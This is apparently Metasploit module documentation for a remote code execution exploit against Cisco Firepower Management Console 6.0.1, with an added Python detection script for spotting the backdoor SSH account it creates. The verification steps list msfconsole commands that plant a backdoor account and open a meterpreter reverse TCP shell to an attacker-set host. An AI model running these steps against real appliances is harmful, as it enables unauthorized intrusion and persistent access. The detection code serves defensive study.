2017-01-09 11:55:01 -06:00
This module exploits a remote code execution vulnerability in Cisco Firepower Management Console. It creates a backdoor SSH account via HTTPS, and then obtains a native payload session over SSH.
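
For defenders, the account the module creates has a random name by default (see NEWSSHUSER below), so matching on a fixed username will not catch it. The following is an added example, not part of the module or its original documentation: it diffs a passwd baseline against the current file and correlates any new interactive account with accepted sshd logins. The sample data, the host name `fmc`, and the assumption that the appliance exposes a passwd(5)-format file and standard OpenSSH log lines are all constructed for illustration.

```python
import re

# Constructed sample data (assumption: not taken from a real appliance).
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000::/home/admin:/bin/bash
www:x:67:67:www:/var/www:/sbin/nologin
"""
CURRENT_PASSWD = BASELINE_PASSWD + "qzkvtr:x:1001:1001::/home/qzkvtr:/bin/bash\n"
AUTH_LOG = """\
Jan  9 11:58:02 fmc sshd[4312]: Accepted password for admin from 192.0.2.10 port 51514 ssh2
Jan  9 12:03:41 fmc sshd[4388]: Failed password for root from 198.51.100.7 port 40122 ssh2
Jan  9 12:04:15 fmc sshd[4401]: Accepted password for qzkvtr from 198.51.100.7 port 40130 ssh2
"""

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")


def parse_passwd(text):
    """Map account name -> (uid, shell) from passwd(5)-format text."""
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or line.startswith("#"):
            continue  # skip malformed or commented entries
        accounts[fields[0]] = (int(fields[2]), fields[6])
    return accounts


def new_login_accounts(baseline, current):
    """Accounts absent from the baseline that have an interactive shell."""
    base, cur = parse_passwd(baseline), parse_passwd(current)
    return {name for name, (_, shell) in cur.items()
            if name not in base and shell not in NOLOGIN_SHELLS}


def ssh_logins_by(accounts, auth_log):
    """(user, method, source) for accepted sshd logins by the given accounts."""
    hits = []
    for line in auth_log.splitlines():
        m = ACCEPTED.search(line)
        if m and m.group(2) in accounts:
            hits.append((m.group(2), m.group(1), m.group(3)))
    return hits


if __name__ == "__main__":
    added = new_login_accounts(BASELINE_PASSWD, CURRENT_PASSWD)
    for user, method, src in ssh_logins_by(added, AUTH_LOG):
        print(f"ALERT: new account {user!r} logged in via {method} from {src}")
```
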
## Vulnerable Application
This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the virtual appliance here:
https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
## Verification Steps
1. Start msfconsole
2. ```use exploit/linux/http/cisco_firepower_useradd```
3. ```set password [https console password for admin]```
4. ```set rhost [IP]```
5. ```set payload linux/x86/meterpreter/reverse_tcp```
6. ```set lhost [IP]```
7. ```exploit```
8. You should get a session
## Options
### USERNAME
The username for Cisco Firepower Management console.
### PASSWORD
The password for Cisco Firepower Management console.
### NEWSSHUSER
The SSH account to create. By default, this is random.
### NEWSSHPASS
The SSH password for the new account. By default, this is also random.
### SSHPORT
The SSH port, in case it was changed for some reason. Otherwise, this is 22 by default.